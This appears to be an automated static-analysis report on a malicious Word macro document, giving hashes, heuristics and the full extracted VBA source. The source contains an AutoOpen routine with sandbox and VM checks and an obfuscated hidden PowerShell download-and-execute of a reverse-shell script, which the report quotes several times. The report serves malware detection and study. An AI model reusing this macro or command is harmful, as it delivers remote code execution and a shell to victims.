Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1eb0262064754767…

MALICIOUS

Office (OOXML)

20.2 KB Created: 2021-06-01 08:07:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-04
MD5: e756fada0a01b39d86757e1185345cc6 SHA-1: 20b8bb711fcc4a8d3e8bbb8f536831003d5c157e SHA-256: 1eb0262064754767efd79db0f5f16a435d52c9a79c58b0030e4fbd7b73bc4b58
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro utilizes WScript.Shell and CreateObject to execute obfuscated commands, including a URL, which likely downloads and executes a second-stage payload. The presence of Shell() calls and obfuscated commands indicates an attempt to bypass defenses and achieve code execution. The macro also includes checks for sandbox environments.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
      mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.2.120/reverse_shell_120_4444.ps1 Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4633 bytes
SHA-256: 4c66526fb64144f892095747f11078e29b3b4d11c1aa4a10777d5932b2d7fa4c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long
Public Declare PtrSafe Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)
Public Const MOUSEEVENTF_LEFTDOWN = &H2
Public Const MOUSEEVENTF_LEFTUP = &H4
Public Const MOUSEEVENTF_RIGHTDOWN As Long = &H8
Public Const MOUSEEVENTF_RIGHTUP As Long = &H10
'Declare sleep
Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Public Declare PtrSafe Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
 
Sub AutoOpen()


If IsSandBoxiePresent(1) = True Then MsgBox ("OH no Sandboxie is here ...")
If IsvirtualboxPresent(1) = True Then MsgBox ("OH no Virtualbox is here ...")
If IsvmwarePresent(1) = True Then MsgBox ("OH no VMWare is here ...")
'If IsSandBoxiePresent(1) = True Then Call SomeSub
'If IsvirtualboxPresent(1) = True Then Call SomeSub
'If IsvmwarePresent(1) = True Then Call SomeSub
'If IsSandBoxiePresent(1) = True Then Call LeftClick
'If IsvmwarePresent(1) = True Then Call LeftClick
'If IsvirtualboxPresent(1) = True Then Call LeftClick
'If IsSandBoxiePresent(1) = True Then Call RigthClick
'If IsvmwarePresent(1) = True Then Call RightClick
'If IsvirtualboxPresent(1) = True Then Call RightClick
If IsSandBoxiePresent(1) = True Then Call Shello
If IsvmwarePresent(1) = True Then Call Shello
If IsvirtualboxPresent(1) = True Then Call Shello

End Sub

Sub msg()
 MsgBox ("Your are in VM ...")
End Sub
 
 Function IsvirtualboxPresent(ByVal OptionToCheck As Integer) As Boolean
   Select Case OptionToCheck
       Case 1  'Recomendado
           Dim hSbie As Long
 
           hSbie = GetModuleHandle("vmcheck.dll")
           If hSbie <> 0 Then
               IsvirtualboxPresent = True
           Else
               IsvirtualboxPresent = False
           End If
       Case 2  'No recomendado
           If InStr(MainFrm.Caption, "[#]") <> 0 Then
               IsvirtualboxPresent = True
           Else
               IsvirtualboxPresent = False
           End If
   End Select
End Function
 
 
 
 
 
 Function IsvmwarePresent(ByVal OptionToCheck As Integer) As Boolean
   Select Case OptionToCheck
       Case 1  'Recomendado
           Dim hSbie As Long
 
           hSbie = GetModuleHandle("dbghelp.dll")
           If hSbie <> 0 Then
               IsvmwarePresent = True
           Else
               IsvmwarePresent = False
           End If
       Case 2  'No recomendado
           If InStr(MainFrm.Caption, "[#]") <> 0 Then
               IsvmwarePresent = True
           Else
               IsvmwarePresent = False
           End If
   End Select
End Function
 
 
 
 
Function IsSandBoxiePresent(ByVal OptionToCheck As Integer) As Boolean
   Select Case OptionToCheck
       Case 1  'Recomendado
           Dim hSbie As Long
 
           hSbie = GetModuleHandle("SbieDll.dll")
           If hSbie <> 0 Then
               IsSandBoxiePresent = True
           Else
               IsSandBoxiePresent = False
           End If
       Case 2  'No recomendado
           If InStr(MainFrm.Caption, "[#]") <> 0 Then
               IsSandBoxiePresent = True
           Else
               IsSandBoxiePresent = False
           End If
   End Select
End Function

Private Sub LeftClick()
  mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
End Sub
Private Sub RightClick()
  mouse_event MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
End Sub


Sub Shello()

  mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
  mouse_event MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"

End Sub
Sub SomeSub()
    End
    'Code will not execute
    Debug.Print "SomeSub: Hello after Exit Sub!"
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 23040 bytes
SHA-256: 24611d12c32b7f9104e68f9976bd03f7c534c5ba6e23983df93d9a9d6246fb31

Open this report in the interactive analyzer, or submit your own file for analysis.